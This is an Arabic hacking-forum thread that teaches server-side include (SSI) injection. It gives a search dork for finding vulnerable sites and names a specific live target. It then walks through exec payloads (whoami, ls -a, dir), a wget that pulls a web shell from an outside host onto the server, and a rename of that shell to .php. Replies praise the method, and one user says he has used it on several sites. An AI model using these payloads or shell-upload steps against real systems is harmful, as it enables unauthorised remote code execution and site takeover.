قنبلة : شرح ثغرات من نوع ssi Injection

Injection · 10-29-2012, 09:21 AM

السلام عليكم ورحمة الله وبركاتة

كيف الحال ؟

الموضوع محتاج فقط كاسه شاي

دورك بسيط : inurl:bin/Cklb/

ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #

اكواد ممكن ان تستعملها

كود PHP:

  <!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"--> 
Will show which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux) 
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows) 
Will display all files in the directory

هذا موقع للتطبيق #

http://dev.stockphotosamerica.com/bin/Cklb

نطبق الكود الثاني في الدخول

كود PHP:

  <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

نشوف

تمام الحين تاكدنا انه الثغرة موجودة وكل شيء تمام خلونا نجرب نرفع الشل

نفذ التالي

كود PHP:

  <!--#exec cmd="wget http://website.com/dir/shell.txt" -->

خلونا نشوف اذا الملف اذا انرفع ولالا

عن طريق امر

كود PHP:

  <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

تمام انرفع بنجاح بس انرفع بصيغة تكست نفذ الامر التالي لنحولة الى بي اتش بي

كود PHP:

  <!--#exec cmd="mv shell.txt shell.php" -->

ونتاكد الان

استعرض

اتمنة وصلت المعلومة لكم كامل الاحترام والتقدير

اخوكم حمد المهندي

GHOST HACK ,nor15din ,Abo-Sagre و 1 آخرون معجبون بهذا

المصدر: :: vBspiders Professional Network ::

rkfgm : avp eyvhj lk k,u ssi Injection

mido868 · 10-29-2012, 11:51 AM

تم التقييم ياغالى

bscbsc · 10-29-2012, 05:10 PM

يعطيك العآفيه اخوي

دام علاء العماد · 10-29-2012, 09:09 PM

موضوع قوي و رائع ، بارك الله فيك يا أخي الكريم و جزاك الله عنا كل خير

Dr.Bat · 10-30-2012, 02:53 AM

وحش ياغالي واصل الي لامام

Cyber Code · 10-30-2012, 03:34 AM

جربت هالثغره من قبل على كم موقع , وفعلا ماقريت من قبل شخصياً موقع عربي شارح عنها شيء,
ملاحضة بسيطه ssi اختصار ل "server side include" وعادتا بالاصح الثغره بنستغلها في حال كان صيغة الصفحة (.shtml) وبنقدر ننفذ اوامر كانها remote code execution مثل ماموضح فوق.

واصل اخ حمد وإلى الأمام .